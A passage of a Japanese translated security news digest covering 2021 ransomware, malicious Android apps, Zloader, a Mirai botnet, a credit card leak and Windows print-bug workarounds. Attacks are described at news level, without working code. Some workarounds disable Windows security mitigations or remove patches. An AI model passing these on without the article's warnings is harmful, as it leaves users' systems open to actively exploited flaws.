 偶、この攻撃の餌食になり、類似のリンクからプログラムをインストールさせられた場合には、アンチウィルス プログラムでコンピュータをスキャンすることが強く推奨される。
 ウィルススキャンで検出されたあらゆるマルウェアを削除した後、直ちにブラウザに保存してある全てのパスワードを変更する必要がある。
研究者は身代金要求型マルウェアのコード中の欠陥を発見したと発言した後、BlackByteの復号プログラム(無料)をリリースした 
 Graham Cluley : News(2021/10/19) 
 見出しは毎日身代金要求型マルウェアに関する悪いニュースがほとんどだが、偶には良いニュースがある。
 Trustwaveのセキュリティ エキスパートはBlackByte身代金要求型マルウェアの犠牲者が、彼らのファイルを復号し復元するために使用することのできる無料の復号ツールをリリースした。そう、身代金を支払う必要はない。
 
彼らのSpiderLabsブログへの一連の投稿 に於いて、TrustwaveのRodel MendrezとLloyd Macrohonは、BlackByte身代金要求型マルウェアの暗号化アルゴリズム中に存在する「奇妙」な設計決定を明らかにしたと説明している。
 各セッションに一意のキーをもたせる他の身代金要求型マルウェアと異なり、BlackByteはファイルを暗号化するために同じRaw Keyを使用しており、対照鍵アルゴリズム(AES)を使用している。ファイルを復号するには、ただ、そのホストからRaw Keyをダウンロードする必要があるだけである。ダウンロードした .PNGファイルが同じである限り、我々は、この同じキーを使用して暗号化されたファイルを復号することができる。
 
 身代金要求型マルウェアのギャングが企業犠牲者のデータを暗号化する前に、そのデータを盗み、身代金が支払われない場合には他のオンライン犯罪者に販売すると主張することは珍しいことではない。
 BlackByteもこの点では違いはない、そして犠牲者はダークWeb上のサイトにリダイレクトされる。そこは、彼らのデータがオンラインオークションに掛けられるために準備されているように思われる。
 
 しかし、このセキュリティ研究者によると、この身代金要求型マルウェアは、データを盗み出すための如何なる機能も含んでいない。そして、この主張は、犠牲者を脅して支払わせるためだけの可能性がある。
 Trustwaveの無料復号ツールは、この身代金要求型マルウェアの設計上の弱点を利用したと主張し、
GitHubからダウンロード することができる。
 予想通り、BlackByte身代金要求型マルウェアのギャングは、Trustwaveの復号化ツールのリリースに対応し、被害者に使用しないよう警告するメッセージをWebサイトに公開した。
  
 我々の身代金要求型マルウェアの復号を幾つかの場所で発見した。我々は、あなた方がそれを使用することを推奨しない。それは、我々は一つのキーだけを使用しているわけではないからである。あなた方のシステムで間違ったキーを使用した場合には、全てのものが破壊されるだろう。そして、あなた方はシステムを二度と復元することは出来ない。あなた方に警告する。この復号プログラムを使用することを決定したなら、あなた方自身がリスクを背負わなければならない。
 ありがとうSpiderLabs”(別名ClownLabs)、あなた方の所為で、多くのシステムが破壊され、あらゆる復元のチャンスを失うだろう。
 
 あなたのコンピュータに感染し、次に、あなたのデータの健全性を大いに気遣いながら金銭を強要するこの犯罪者はなんて優しいのだろう。言うまでもなく、如何なる復号ツールも、それを実行する前に重要なデータをバックアップする必要がある。
新しいWindows 10 KB5006670アップデートはネットワーク印刷をできなくする 
 BleepingComputer : News>Security(2021/10/15) 
 今週リリースされたKB5006670累積アップデートとたのアップデートをインストールした後、Windows 10ユーザとアドミニストレータは、世界規模でネットワーク印刷問題を報告している。
 火曜日、Microsoftは、
2021年10月の定例アップデート の一部としてバグとセキュリティ上の脆弱性を修正するWindowsアップデートをリリースした。
 これらのアップデートは、Windows 11用の 
KB5006674 、Windows 10 2004, 20H1, 21H1用の 
KB5006670 、Windows 10 1909用の KB5006667、Windows 8用の KB5006714 を含んでいる。
 KB5006670アップデートをインストールした後、ユーザはネットワーク印刷サービスで印刷することができないと報告している。また、一部のユーザは印刷しようとした時に 0x00000709 もしくは 'Element not found' エラーを受け取っている。
 BleepingComputerのフォーラムトピックの8ページに於いて、Windowsアドミニストレータ達は印刷バグでのフラストレーションを詳しく話し、この問題を解決するには今週のアップデートをアンインストールすることという同じ結論に至っている。
 7月以来、MicrosoftはWindows Print Spoolerの
PrintNightmare 脆弱性を修正するセキュリティアップデートを定期的にリリースしてきた。
 
身代金要求型マルウェアのギャング を含む脅威のアクターは、これらの脆弱性を積極的に悪用しているので、Microsoftは、Point and Print印刷機能を徹底的に変更した。残念ながら、これらの変更は幾つかの脆弱性を修正したが、ネットワーク印刷サーバに対する印刷問題を導いた。
 今週、Microsoftは、
CVE-2021-41332  と 
CVE-2021-36970  として追跡されるWindows印刷脆弱性に関する更なるセキュリティアップデートをリリースした。
 報告されている問題の殆どは、Windows 10の KB5006670 アップデートに関連しているが、おそらくこれは、Windows 10が、現時点で最も広汎に使用されているWindowsのバージョンだからと思われる。
 同じセキュリティ フィックスが、Windows 10 1909 と Windows 11用にリリースされている。そして、これらのWindowsバージョンでも類似の問題が多分発生するだろう。
KB5006670ネットワーク印刷問題を修正する方法 
 9月の累積アップデートが印刷問題を発生させた時、非アドミニストレータがプリンタドライバをインストールすることを可能にするか、
'RpcAuthnLevelPrivacyEnabled'レジストリ値を無効にする ことによって問題を修正することは可能だった。
 しかしながら、このレジストリキーは10月のアップデートによって発生した問題には最早動作しない。そこで、ユーザは、他の方法を使用してこの問題を修正することが要求されている。
 この
BleepingComputerフォーラムトピック は、Windows 10 KB5006670アップデートによって発生したネットワーク印刷問題を解決するための方法に関するWindowsアドミニストレータからの沢山の提案を含んでいる。残念ながら、これらの提案は、このセキュリティアップデートを削除するか、常に上手く行くとは限らないものなので、これらの提案は、この問題を解決する理想的なものではない。
 これらの印刷問題を引き起こしフラストレーションを起こさせているものは、Microsoftの明瞭なガイダンスの欠乏と、Windows印刷機能に対して毎月発生させている沢山の変更にある。
 これらの変更は全てWindows Print Spoolerの様々な脆弱性の側面を解決すると同時に、Windowsアドミニストレータが、印刷問題を修正するか否かを判断する必要のある個々の修正を台無しにしている。
 BleepingComputerは、これら全ての問題を解決するための公式ガイダンスをMicrosoftに問い合わせたが、現時点で回答はない。
方法 1: KB5006670アップデートをアンインストールする 
 殆どの一般的な提案は、単純にKB5006670アップデートをアンインストールすることである。そしてこれは、管理者特権でのコマンドプロンプトで以下のコマンドを使用することで実行できる。
wusa /uninstall /kb:5006670
 
 しかしながら、このアップデートをアンインストールすることは、
74の脆弱性(積極的に悪用されているものを含む)用のセキュリティフィックス を削除するので、これは危険な方法である。
方法 2: C:\Windows\System32\Win32spl.dllを置き換える 
 別の方法は、ネットワーク印刷問題を修正する2021年9月のアップデート バージョンにある
Win32spl.dll ファイル を置き換えることが発見されている。
 「KB5006670は、印刷を停止するC:\Windows\System32\Win32spl.dllのバージョン10.0.19041.1288に置き換える。 
 このDLLは、おそらくセキュリティアップデートの一部を変更するので、これもまた将来可能な脆弱性の悪用に対する防御の減退が、あなたのコンピュータに発生するだろう。
方法 3: プリントサーバにプリンタキューを再作成する 
 一部のユーザは、プリントサーバに彼らのプリンタを削除し、再インストールすることで問題が解決されたと報告している。
 アドミニストレータとして、プリンタを削除し再インストールすると、このキューは再構築される。もしかすると、再び印刷が動作する可能性がある。
 しかしながら、ワークステーションは、新しいプリンタキューを使用するために再設定を必要とする可能性がある。これは、一部の組織にとっては多くの時間を消費する業務になる可能性がある。
方法 4: CopyFiles機能を再び有効にする 
 最後に、ヒューレットパッカードの一部のプリンタドライバは
CopyFiles機能 を要求する。これは、Microsoftが9月にDefaultで無効にしている。
 この機能を依然として必要としているユーザのために、この機能を再び有効にすることができるようにMicrosoftは非表示のGroup Policyを導入している。
 Copy Files機能を有効にするにはHKLM\Software\Policies\Microsoft\Windows NT\Printersの下に、CopyFilesPolicyと名付けたキーを作成し、Windowsレジストリの値を作成する。この値を"1"に設定すると、Copy Filesは再び有効になる。
Google Play上に存在しているAndroidアプリケーションPhoto editorはマルウェアである 
 BleepingComputer : News>Security(2021/10/12) 
 注意:  このアプリケーションは、BleepingComputerがPlayストアを介してGoogleに通知した後、直ちに削除された。
 Google Playストアで客引きしているAndoroidアプリケーションは、それ自体は画像編集ソフト(以下、Photo Editor)である。しかし、このアプリケーションはFacebook認証情報とユーザの支払い情報を盗み、ユーザの代わりに広告キャンペーンを実行する可能性のあるコードと含んでいる。
 このアプリケーションは"Blender Photo Editor-Easy Photo Background Editor"と名付けられており、これまでに5,000回以上インストールされている。
 先週、500,000回以上インストールされている類似の悪意あるアプリケーションもまた、Play Storeで発見されている。
Facebookでのログインは、ログインだけではない 
 多くのAndroidアプリケーションの様に、"Blender Photo Editor-Easy Photo Background Editor"アプリケーションもFacebook機能付きのサインインを備えている。ただし、Fecebook認証情報を利用して何らかの悪事を働く。
 KasperskyのAndoroidマルウェアのアナリスト
Tatyana Shishkova は、今週(記述している時点で)Google Playストア上で
利用可能なまま になっている「トロイの木馬」アプリケーションを発見した。
 
 このアプリケーションには、Evina(モバイル決済サイバーセキュリティ企業)のセキュリティ研究者である
Maxime Ingrao が、先週類似の"photo editor"アプリで発見したものと同じ悪意のあるコードが含まれていた。 
 これらのAndroidアプリケーションは、AndroidユーザにFacebookアカウントを介してサインインし、これらのアプリケーションにアクセスするように要求している。しかし次に、暗黙のうちに、このアプリケーション中に隠されている暗号化されたJavaScriptコマンドを介して認証情報が収集される。
 次に、このアプリケーションは、ユーザのFacebookアカウントを覗き見し、あらゆる広告キャンペーンを探すためにFacebook Graph APIへのリクエストを実行し、そして格納されている支払い情報を盗む。
 Ingraoによると、このマルウェアは「あなたが行った可能性のある広告キャンペーンと、登録済みのクレジットカードを持っているか否かに非常な関心を示している」。 これは、これらのアプリケーションの背後にいる攻撃者が、ユーザーのFacebook認証情報、および関連する支払い情報を介して独自の広告キャンペーンの作成が可能である。 
同様のアプリケーションは500,000回以上インストールされている 
 Ingraoは以前、 "Magic Photo Lab - Photo Editor"と"Pix Photo Motion Edit 2021"と呼ばれる類似の悪意あるアプリケーションを発見しており、後者は500,000インストールされている。
 この二つのアプリケーションは、既にGoogle Playストアから削除されている。
 
 この研究者は、これらのアプリケーションが不正であることを発見した方法に関してBleepingComputerと見識の一部を共有した。
 Ingrao(フランスのセキュリティ研究者)は、eMailインタビューに於いてBleepingComputerに対して「私は最初に、動的解析を実行することによって疑わしいコードに気がついた」と、続けて「私はWebViewが認証情報を取得するためにJavaScriptを実行することに気がついた。次に、コードをダウンロードしコード内部のテキストを復号する関数をコーディングし直した。これが実行されたJavaScriptとFacebook Graph APIコールを発見した方法である」と述べている。
 BleepingComputerはまた、依然としてGoogle Playに存在している"Blender Photo Editor-Easy Photo Background Editor"用の
APK (Android Programing Package)を解析した。そして、このアプリケーション中に同じ悪意あるコードを確認した。
 我々が解析している間に、我々はコンパイルされたAPK(Java仮想マシンの命令セット)からAndroidアプリケーションのJavaソースコードをザッと再構築することを企てた。
 この疑わしいクラス"sources/com/easyblender/blendphoto/Blends/ext/AnaActivity.java"は、Ingraoによって言及されたWebViewを含んでいる。更に、我々は、m.facebook.comやm.fb.comドメインを参照する "m.face" や "m.f" のような部分文字列に気がついた
 様々な場所に於いて難読化されたコードは、このアプリケーションが実行されている最中にのみ復号されるJavaScriptコードと共に暗号化された文字列を含んでいる。Facebook APIに対して本物であることを証明するためにユーザのFacebookの"
access_token "を入手し、"
c_user "のようなFacebookセッションクッキーにアクセスするようにコード中で指示している。そして、これらの全ては、通常の"Sign-in with Facebook"ワークフローの一部として表示される可能性がある。
  
 しかし、実行時に、
Ingraoによって発見された 以下のJavaScriptコードは、追加のスパイを実行する。このアプリケーションによって起動されたWebViewは、このJavaScriptコードを実行し、ユーザーが入力したFacebookの認証情報を取得する。
 そしてこれは、FacebookのGraph APIに対する前述のリクエストが実行されたときであり、ユーザーのアカウント中に存在するFacebook広告キャンペーンと関連する支払い情報を覗き込む。
 
 Androidユーザーは、最近GooglePlayストアで見られるこのような"Photo Editor"アプリケーションに注意する必要がある。このようなアプリを既にインストールしている人達は、即座にこのアプリケーションをアンインストールし、スマートフォンをクリーンアップし、Facebookの認証情報をリセットする必要がある。
Brother製USB接続プリンタ、Windows11で稼働しない可能性(2021/10/14) 
 タイトルの通り、Brother製USB接続プリンタが、Windows11で稼働しない可能性が発表されています。以下のサイトを確認してください。
 Brotherホームページ(和文): https://support.brother.co.jp/j/b/oscontents.aspx?ossid=14
 Brotherホームページ(英文): https://help.brother-usa.com/app/answers/detail/a_id/175628
Windows 0x0000011b ネットワーク プリント エラーの修正方法 
 BleepingComputer : News>Security(2021/09/20) 
 1月にリリースされ、今月完全に施行されたWindowsセキュリティアップデートは、Windowsユーザがネットワーク プリンタで印刷している時に 0x0000011b エラーを発生させている。
 2021年01月に、Microsoftは
CVE-2021-1678 として追跡される'Windows Print Spooler Spoofing Vulnerability'を修正するためのセキュリティ アップデートをリリースした。
 「セキュリティがバイパスされる脆弱性は、Printer Remote Procedure Call (RPC)バインドがリモート Winspoolインターフェイスの認証を処理する方法中に存在している」と、この脆弱性に関する
サポート ブレティン は説明している。
 セキュリティ アップデートがリリースされた時、このアップデートは、デバイスをこの脆弱性から自動的に保護しなかった。しかしながら、管理者が、ネットワーク プリンティングが使用するRPC認証レベルを増大するために新たなレジストリキーを追加することで、この脆弱性を軽減できた。
 言い換えれば、このセキュリティ アップデートは、Windows管理者が、以下のレジストリキーを作成した場合を除き、脆弱性を修正していなかった。
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print]"RpcAuthnLevelPrivacyEnabled"=dword:00000001 
 
 しかし、今月9月14日の定例のセキュリティアップデートで、Microsoftは、このレジストリ設定が作成されていない場合も含め、全てのWindowsデバイスにこの設定をDefaultで有効にした。
 この軽減策をDefaultで有効にしたことで、ネットワークプリンタで印刷している時に、
Windowsユーザは、 0x0000011b エラーを受け取ることが始まった 。
 この印刷エラーは、WindowsドメインのKerberos(【訳注】ネットワークを通じてコンピュータ間で利用者の認証を行う方式の一つ。複数のサーバで共通に認証情報を利用することができ、通信経路を暗号化して認証情報を安全に送受信することができる(IT用語辞典より))セットアップを利用できない中小企業やホームネットワークで主に見られる。
 9月のWindowsセキュリティアップデートをアンインストールするとこの問題は修正されるが、それに伴い、そのデバイスは、脅威のアクターが積極的に脆弱性攻撃している二つの脆弱性(
PrintNightmare と
MSHTML )を開くことになる。
 より良い方法は、Microsoftが新しいガイダンスを公表するまで、CVE-2021-1678用の軽減策を無効にすることである(この脆弱性は、積極的に攻撃されていないので)。
0x0000011b 印刷エラーの修正方法 
 現在のWindowsアップデート(KB5005565)を削除せずに 0x0000011b 印刷エラーを修正するには、今月Defaultで有効にされたCVE-2021-1678軽減策を無効にすることである。
 これを実行するには、Windowsレジストリ エディタを開き、 
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print key に移動する。次に、新しく
RpcAuthnLevelPrivacyEnabled という名前でDWORD-32bit値を作成し、0に設定する。レジストリファイルは以下のようになる。
Windows Registry Editor Version 5.00 
 より簡単にこの変更を追加するには、あなたに代わって追加してくれる 
fix-0x0000011b.reg  レジストリ ファイルを使用することができる。
 あなたのプリント サーバと、それに接続しているあなたのWindowsデバイスの両方にこのファイルをダウンロードし、このファイル上をダブルクリック、そして、このデータを統合することを許可しなさい。
 
 この軽減策を無効化すると、もはやこの脆弱性は保護されない。しかし、再び印刷は可能になる。
 これが、あなたの問題を解決しない場合には、
enable-RpcAuthnLevel.reg  を使用してWindowsのDefaltに戻しなさい。
新しいZloader攻撃は検出を回避するためにWindows Defenderを無効にしている 
 BleepingComputer : News>Security(2021/09/14) 
 現在進行中のZloader作戦は、検出を回避するために犠牲者のコンピュータ上の
Microsoft Defender Antivirus (以前のWindows Defender)を無効にする新しい感染チェーンを使用している。
 Microsoftの統計によれば、Microsoft Defender Antivirusは、実行されている
10億を超えるシステム にプレインストールされているアンチマルウェア ソフトである。
 攻撃者達は、このマルウェアの拡散方法をスパムやeMailから、ターゲットをインチキのダウンロードサイトにリダイレクトするために、Google Adwordsを介して公開されるTeamViewer Google広告に変更している。
 そこから、ターゲットにされた人たちは、彼らのコンピュータにZloaderマルウェア ペイロードをインストールするように署名され設計された悪意あるMSIインストーラをダウンロードするように欺かれる。
 「この調査で解析されたこの攻撃チェーンは、ステルス性のより高いレベルに到達し、この攻撃の複雑さがどのように成長したかを示している」と、SentinelLabsのセキュリティ研究者Antonio PirozziとAntonio  Cocomazziは
本日公開されたレポート で述べている。
 「第一段階のドロッパーは、古典的な悪意あるドキュメントからステルスで署名付きのMSIペイロードに変更された。これは、防御を損ないペイロードの実行を代行させるためにバックドア化されたバイナリと一連のLOLBASを使用する。」
 
この攻撃はオーストラリアとドイツの銀行顧客に焦点を当てている 
 Zloader (TerdotやDELoaderとしても知られる)は、本来はバンキング トロイであり、幾つかの英国金融機関の顧客をターゲットにした攻撃に使用された2015年08月に発見された。
 
Zeus Panda や
Floki Bot のように、このマルウェアは10年ほど前にソースコードがオンラインにリークされた Zeus v2 Trojanにほぼ完全に基づいている。
 オーストラリア、ブラジルから北アメリカに至るまで世界中の
銀行をターゲット にしているこのマルウェアは、Webインジェクション(【訳注】正規サイトを表示した際に、偽表示を付け加えて情報を詐取する手法(Trend Micro is702より))を介して金融データを収穫しようとし、認証コードと資格情報を手渡すように感染した顧客を説得するためにソーシャルエンジニアリングを使用する。
 最近では、
Ryuk や
Egregor のような身代金要求型マルウェアのペイロードを拡散するために使用している。Zloaderはまた、バックドアとリモートアクセス機能と共に出現した。また、感染したデバイス上に更なるペイロードをドロップするためにマルウェエア ローダとして使用することもできる。
 SentinelLabsの調査によると、この最新のキャンペーンは、ドイツとオーストラリアの金融機関の顧客を基本的にターゲットにしている。
 「ZLoaderキャンペーンで、この攻撃チェーンを観察したのはこれが初回である」と、
SentinelLabsの研究者は結論付け 、「記述している時点で、我々は、拡散チェーンが特定のアフィリエイトによって実装されているのか、あるいは、メインのオペレータによって提供されているのか否かの証拠を持っていない」と述べている。
 2020年の初めから、彼らが
Malsmokeと名付けたこの悪意ある広告キャンペーン を追跡しているMalwaerBytesは、脅威のアクターがアダルトをテーマにしている悪意あるサイトを介してFallout脆弱性攻撃キットを使用してSmoke Loaderマルウェア ドロッパーで彼らのターゲットに感染しているのを見つけた。
 
セキュリティ研究者nao_sec によると、彼らは2021年8月末から、Discord、TeamViewer、Zoom、QuickBooksを模倣したサイトに切り替えており、個人ではなく企業をターゲットにしていると思われる。
ボットネットはRealtek SDKを使用している数十万のデバイスをターゲットにしている 
 BleepingComputer : News>Security(2021/08/23) 
 MiraiをベースとするボットネットはRealtekベースの数十万のデバイスに使用されているソフトウェアSDK中の緊急の脆弱性を、今ターゲットにしている。これはAsus, Belkin, D-Link, Netgear, Tenda, ZTE, Zyxelを含む少なくとも65のベンダからの200モデルを含んでいる。
 IoT Inspectorセキュリティ研究者が発見したこのセキュリティフローは、現在CVE-2021-35395として追跡され、緊急度10段階のうち9.8が割り当てられている。
 レジデンシャル ゲートウェイ、トラベルルータから、Wi-Fiリピータ、IPカメラ、スマート照明ゲートウェイ、ネットに接続可能なおもちゃに至るまで
インターネットに晒されている多くのワイアレスデバイスに影響を与える 。
攻撃は一般公開後、僅か2日で始まった 
 このバグは管理Webインターフェースに影響を与えるので、リモート攻撃者は、スキャンし、ハッキングを試み、パッチが適用されていないデバイスに対して任意のコードをリモードで実行し、影響を受けるデバイスを乗っ取ることが可能になる。
 Realtekは、この脆弱性のあるSDKの
パッチしたバージョン を08月13日にリリースしたが、IoT Inspectorセキュリティ研究者が、
彼らのアドバイザリ を公開する前の3日間に脆弱なデバイスの所有者が、このパッチを適用するにはあまりにも時間がなかった。
 「08月18日現在、我々は、オンライン上でCVE-2021-35395を脆弱性攻撃する目論見を同定している」と先週
レポートを公開した SAMは述べている。
 このボットネットによってターゲットにされているバグだらけのRealtek SDKを使用している大多数の汎用デバイスは、Netis E1 +エクステンダー、EdimaxN150とN300Wi-Fiルーター、および、主にWi-Fi受信を強化するために使用されるRepotecRP-WR5444ルーターであると、SAMは述べている。
ボットネットはアップデートされており新しいデバイスをターゲットにしている 
 このMiraiベースのボットネットの背後にいる脅威のアクターは、2週間前以前に、
緊急の認証バイパス脆弱性(CVE-2021-20090)を攻撃 するために彼らのスキャナをアップデートし、Arcadyanファームウェアを使用している数百万のホームルータに影響を与えられるようにしている。
 現時点でJuniper Threat Labsの研究者が明らかにしているように、この脅威のアクターは、少なくとも2月以来ネットワークとIoTデバイスをターゲットにしている。
 「このイベントのチェーンは、ハッカーがコマンド挿入脆弱性を積極的に探し、広汎に使用されているマルウェアを素早く拡散しようとしていることを示している」とSAM Seamless NetworkのOmri Mallis(chief product architect)は発言している。
 「これらの種類の脆弱性は、悪用することが容易であり、デバイスにパッチが適用され、セキュリティベンダが対応できるかなり前に、攻撃者が採用している既存のハッキングフレームワーク中に簡単に統合することができる。」
 影響を受けるデバイスの完全なリストは、ここに記載するにはあまりにも膨大なので、
IoT Inspectorレポートの末尾 を参照されたい。
カード市場を宣伝するために盗まれた100万のクレジットカードがリークされた 
 BleepingComputer : News>Security(2021/08/09) 
 脅威のアクターは、2018年から2019年に盗んだ100万のクレジットカードをハッキングフォーラムにリリースすることによって、新しい犯罪Carding(不正取引)市場を宣伝している。
 Cardingとは、盗んだクレジットカードを不正取引し使用することである。これらのクレジットカードは、
point-of-sale malware , 
magecart attacks on websites , 情報窃取トロイの木馬を介して盗んだものである。
 これらの盗まれたクレジットカードは、次に犯罪不正取引市場で販売される。この市場は、脅威のアクターがオンライン購入を、より一般的には、追跡困難なプリペイド ギフトカードを購入するためにそれらを購入する場所である。
 All World Cardsと名付けられた新しいカード犯罪不正取引市場は、多数のハッキングフォーラムに投稿され、そこで、彼らは100万のクレジットカードを無料でリークした。
 フォーラムの投稿によると、これらのクレジットカードは、2018年から2019年に盗まれたものである。
 
 ランダムに選んだ98のカード(盗んだカードのおよそ27%)は、依然として使用可能であると、この脅威のアクターは述べている。
 しかしながら、イタリアのセキュリティ企業D3Labsは、50%が依然として使用可能であり、当初示されていた値より遥かに大きいとレポートしている。
 「現時点で、我々解析チームへのフィードバックは依然として限定的であるが、カードのおよそ50%が未だ使用可能であり、未だセキュリティ侵害されたと特定されていない」と、D3Labは、このリークに関して
ブログに投稿 している。
 サイバーセキュリティ企業Cybleは
クレジットカードのダンプを解析 し、このリークは、クレジットカード番号、有効期限、セキュリティコード、名前、国名、州、市、住所、各クレジットカードの郵便番号、eMailと電話番号を含んでいるとBleepingComputerに告げている。
 Cybleは今までに、40万のカードを解析しただけであるが、関連する銀行のトップ5は以下である。
 ・ STATE BANK OF INDIA (44,654 cards、インドステイト銀行、インド) 
 あなたのカードが、この漏洩の一部であるか否かをチェックするするために、Cybleは彼らの
AmIBreached サービスにそのデータをインポートしている。
 あなたの情報が、この漏洩中に見つかった場合には、クレジットカード会社に連絡を取り新しいクレジットカードと番号を再発行してもらうように強くアドバイスする。
 また、クレジットカードの明細書を徹底的に確認して過去の不正請求と今後の請求を確認する必要がある。 
All World Cards市場 
 All World Cardsのサイトは、カード不正取引市場では比較的に新参者である。そして、この宣伝は、このダンプをダウンロードした脅威のアクターの賞賛を受けている。
 この不正取引サイトは2021年05月に始まり、クレジットカードの在庫数は2,634,615である。カード最大の国は米国であり、1,167,616カードが販売されている。
 カードの販売価格は、$0.30から$14.40(33.20円から1594円)であり、その70%は$3.00から$5.00(332.02円から553.37円)である。
 All World Cardsは、サイバー犯罪企業やThreat Intelligence(【訳注】スレットインテリジェンスとは、「脅威情報」とも呼ばれるもので、サイバーセキュリティ関連の多くの情報を収集、蓄積し、それらを分析することで、脅威に対抗するための方法に生かしていくもの(Cyber Security.comより))企業が注目する新しい市場である。
 彼らは大物になることを目指しており、この100万の無料ダンプにより、他の多くの脅威アクターを彼らの市場に引き付ける可能性がある。 
コンピュータハードウェア大手GIGABYTEがRansomEXX身代金要求型マルウェアに攻撃された 
 BleepingComputer : News>Security(2021/08/06) 
 台湾のマザーボードメーカGigabyteが、RansomEXX身代金要求型マルウェアのギャングによって攻撃された。このギャング共は身代金が支払われない場合には、盗んだ112GBのデータを公開すると脅している。
 Gigabyteはマザーボードで著名であるが、グラフィックスカード、データセンターサーバ、ラップトップ、モニターのような他のコンピュータ コンポーネントやハードウェアも生産している。
 この攻撃は先週の火曜日の夜から水曜日にかけて発生し、この企業に台湾にあるシステムをシャットダウンさせた。この事件はまた、この企業のサポートサイトや台湾のWebサイトの一部を含む複数のWebサイトに影響与えた。
 
 顧客はまた、サポートドキュメントへのアクセスやRMA(【訳注】Return Merchandise Authorization、返品保証)に関するアップデート情報の入手に関する問題も報告している。
 中国語のニュースサイト
United Daily News (【訳注】聯合報、台湾の新聞)によると、Gigabyteは、サイバー攻撃で影響を受け幾つかのサーバが影響を受けたことを認めている。
 彼らのネットワークの異常な挙動を検出した後、GigabyteはITシステムをシャットダウンし、法執行機関に通知した。
 当該サイバー攻撃または、他の報告されていないサイバー攻撃に関する直接情報がある場合は、Signal +16469613731、または、Wire @lawrenceabrams-bc で内密に連絡することができる。 
 
GigabyteはRansomEXX身代金要求型マルウェア攻撃で損害を被っている 
 Gigabyteは、どの身代金要求型マルウェア作戦が攻撃を実行したのかは、公式には発表していないが、BleepingComputerはRansomEXXギャングによるものと認識している。
 RansomEXXオペレータはネットワークを暗号化する時、暗号化された各デバイス上に脅迫文を作成する。
 これら脅迫文には、犠牲者が一つのファイルを復号するテストをするためにアクセス可能な非公開のページへのリンクが含まれている。
 本日、ある情報筋がBleepingComputerにGigabytes Technologies用の非公開のRansomEXXリークページへのリンクを送信してきた。このページには、この脅威のアクターが攻撃を通して112GBのデータを盗んだと主張している。
 
 このプライベートのリークページで、この脅威のアクターは、Gigabyteネットワークの内部、並びにAmerican Megatrends Git Repositoryから112GBのデータを盗んだと主張している。
 我々は、112GB(120,971,743,713 bytes)のファイルをダウンロードした。そして、これを公開する準備ができている。 
 この脅威のアクターは、攻撃中に盗み出しNDA下にある四つのドキュメントのスクリーンショットを公開している。
 我々はリークされた画像を投稿しないが、この機密のドキュメントはAmerican Megatrendsデバッグ ドキュメント、Intelの「潜在的な問題」ドキュメント、"Ice Lake D SKU stack update schedule"、AMD改訂ガイド、を含んでいる。
 BleepingComputerは、この攻撃に関してGigabyteにコンタクトしたが、現時点で回答はない。
RansomEXXについて知る必要のあること 
 RansomEXX身代金要求型マルウェア作戦は本来、2018年にDefrayという名前で開始されたが、彼らがより積極的になった
2020年6月、RansomEXXに名称変更 されている。
 他の身代金要求型マルウェア作戦同様に、RansomEXXは、リモートデスクトップ プロトコルを介してネットワークに侵入し、攻撃し、機密データを盗む。
 彼らがネットワークへのアクセスを取得すると、彼らはゆっくりとWindowsドメイン コントローラの制御を奪うので、多くの機密ファイルを収穫するだろう。ネットワークを介しての、この水平拡散の間に、この身代金要求型マルウェア ギャングは身代金恐喝の効果を持たせるために暗号化されていないデバイスからデータを盗み出す。
 RansomEXXはWindowsデバイスだけをターゲットにしているわけではなく、VMware ESXiサーバを稼働している
バーチャルマシンを暗号化するためにLinux暗号器も作成 している。
 過去一ヶ月に渡り、RansomEXXギャングは、
イタリアのラツィオ州 、
エクアドルの国家電気通信会社 (Corporacion Nacional de Telecomunicaciones:CNT)への最近の攻撃に見られるように、より積極的になっている。
 身代金要求型マルウェアのギャングによる他の注目を集める攻撃には、
ブラジル政府のネットワーク 、
Texas Department of Transportation (TxDOT、テキサス運輸省)、
コニカミノルタ 、
IPGフォトニクス 、
Tyler Technologies (タイラー テクノロジーズ)が含まれる。 
WindowsへのPetitPotam攻撃は新しい方法でブロックすることができる 
 BleepingComputer : News>Security(2021/08/02) 
 セキュリティ研究者たちは、最近公開されたPetitPotam攻撃ベクトル(ハッカーがWindowsドメインコントローラの制御を簡単に取得することを可能にする)をブロックする方法を考案した。
 先月、セキュリティ研究者GILLES Lionelは、
PetitPottamと名付けられた新しい方法を公開した 。PetitPottamは、Microsoft Encrypting File System Remote Protocol (
EFSRPC )を使用して、脅威のアクターの悪意あるNTMLリレーサーバに対してWindowsドメインコントローラを含むWindowsマシンに認証を強制するものである。
 脅威のアクターは次に、この認証要求をHTTPを介して標的にしているドメインのActive Directory Certificate Servicesにリレーする。ここで、攻撃者はKerberos ticket-granting ticket (TGT)を与えられる。これで、彼らはそのドメインコントローラのIDを引き継ぐことが可能になる。
 このベクトルが公開された後、研究者は直ちに、この方法のテストを開始し、認証をダンプしWindowsドメインを乗っ取ることがいかに簡単であるかを説明した。
PetitPotam NTLM relay attack demonstration  from BleepingComputer.com  on Vimeo .
 上の動画が表示されない場合はこちら 
 
 この攻撃を使用して、脅威のアクターは、Windowsドメインを完全に制御することができる(新しいグループポリシー、スクリプトを押し付けたり、身代金要求型マルウェアのようなマルウェアを全てのデバイスに配備することを含む)。
 先週、MicrosoftはNTMLリレー攻撃を緩和する方法を説明した '
Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) 'と題されたアドバイザリをリリースした。
 「NTLMが有効にされたネットワーク上でNTLM Relay Attacksを防ぐには、ドメイン管理者は、NTLM認証を許可するサービスが
Extended Protection for Authentication (EPA) のような防御を使用するか、SMB署名のような署名機能を使用する必要がある」と「PetitPotamは、Active Directory Certificate Services (AD CS)がNTLMリレー攻撃用の防御に設定されていないサーバを悪用している。
KB5005413 で概要されている緩和策は、顧客にこのような攻撃から彼らのAD CSサーバを防御する方法に関して説明している」と、Microsoftのアドバイザリは説明している。
 Microsoftの提案は、NTLMリレー攻撃を妨げるかもしれないが、彼らはPetitPotamのブロックに関しては何のガイダンスも提供していない。
 「NTLMv1のダウングレードや、このマシンアカウントがローカル管理者であるコンピューターのマシンアカウントにリレーするような様々な攻撃に使用できる」と、この攻撃ベクトルを彼が最初に公開した時、LionelはBleepingComputerに告げている。
 PetitPotam, 
SeriousSAM , 
PrintNightmare のような最近の脆弱性に対するMicrosoftの対応は、Microsoftの顧客保護は不十分であると感じているセキュリティ研究者を大変心配させている。
 Florian RothのTweetはこちら 。
NETSHフィルタを使用してPetitPotam攻撃をブロックするには 
 グッドニュースは、研究者が、ローカルEFS機能に影響を与えることなくNETSHフィルターを使用することでリモート非認証PetitPotam攻撃をブロックする方法を発見したことである。
